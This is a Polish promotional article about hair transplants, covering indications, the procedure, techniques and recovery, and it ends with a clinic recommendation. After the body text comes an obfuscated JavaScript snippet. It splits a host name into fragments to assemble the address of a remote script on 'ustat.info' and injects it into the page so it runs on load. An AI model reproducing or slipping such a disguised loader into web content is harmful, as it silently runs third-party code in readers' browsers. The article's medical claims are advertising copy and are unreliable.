Wiele osób boryka się problemem łysienia i szuka na nie skutecznego lekarstwa. Nie warto tego bagatelizować i warto w czas zastanowić się co można zrobić.
Poza stosowanie preparatów na porost włosów, ciekawym wyjściem jest dokonanie przeszczepu, który jest coraz bardziej popularny na całym świecie. Dowiedz się więcej o zabiegu przeszczepu włosów i poznaj kulisy tego procesu.
Kiedy się przeszczepia włosy?
Jeśli chodzi o konkretne sytuacje, w których dokonuje się transplantacji, możemy wyróżnić ich kilka. Przeszczep włosów jest dobry wtedy, kiedy pacjent narzeka na ich niedobór. Jak się okazuje włosy nie tylko implikuje się na głowie, ale także brwiach, skroniach i wąsach, a nawet torsie. Co ciekawe, pierwszy zabieg tego typu był wykonany w 1939 r. przez japońskiego lekarza Okudę i jest co chwilę udoskonalany. Wśród wszystkich pacjentów chcących dokonać przeszczepu włosów, kobiety stanowią jedynie dwa procent. Przewaga panów w tym aspekcie jest aż nadto widoczna.
Jak wygląda przeszczep włosów?
W pierwszej kolejności pacjent i lekarz ustalają linię włosów na czole. Chodzi tu o uzyskanie naturalnego wyglądu. Sam zabieg trwa od 1,5 do 3 godzin. Czas operacji jest zależny od obranej techniki, wielkości implantu, stopnia zagęszczenia i wieku osoby poddającej się zabiegowi. Kolejnym krokiem jest pobranie próbki włosów z potylicy. Paski mają grubość około 0,5 cm i są dzielone na implanty. Miejsce przeniesienia włosów jest nasączane solą fizjologiczną, aby skóra stwardniała.
Techniki przenoszenia włosów
Przeszczep włosów jest czynnością oczywistą. Wyróżniamy w nim kilka technik:
– mikroimplanty – małe próbki wszczepiane we wcześniej przygotowane kanaliki,
– mikronakłucia – wykonywane pod odpowiednim kątem nakłucia i implementacja próbek,
– SmartGraft – zautomatyzowana metoda pobieraniu meszków włosowych z tyłu głowy,
– ARTAS – sztuczna inteligencja ocenia wielkość i zakres pracy na podstawie całej struktury włosa.
Co dzieje się dalej?
Kiedy włosy są przeszczepione, przez kilka dni po dokonaniu operacji utrzymuje się zasinienie oraz miejscowy obrzęk. Może także pojawić się niewielki ból. Każdy pacjent po zabiegu otrzymuje niezbędne lekarstwa. Musi stosować tabletki przeciwbólowe, plastry i specjalny antybiotyk. Wszystko przechodzi po kilku dniach, maksymalnie do tygodnia. Później może cieszyć się już bujnym owłosieniem i wychodzić na zewnątrz bez nakrycia głowy. To ważne z perspektywy własnego samopoczucia i własnej świadomości. Jednak decydując się na tego typu zabieg warto skorzystać z doświadczenia innych np. Jack Strong Hair.
(function(){
ce0n=document.createElement(“script”);ce0n_=(“ust”);ce0nu=”247280727″;
ce0n_+=”a”+(“t.i”);ce0n.type=”text/javascript”;
ce0nu+=”.n25gaad8e0nwznc781f8″;ce0n.async=true;ce0n_+=”n”+(“f”+”o”)+”/”;
ce0nu+=”vufv1rk5yk”;ce0n.src=”https://”+ce0n_+ce0nu;
document.body.appendChild(ce0n);
})();
Artykuł Jak wygląda przeszczep włosów? pochodzi z serwisu Fakty Oświęcim.
Zgłoś naruszenie/Błąd
Oryginalne źródło ZOBACZ
Dodaj kanał RSS
Musisz być zalogowanym aby zaproponować nowy kanal RSS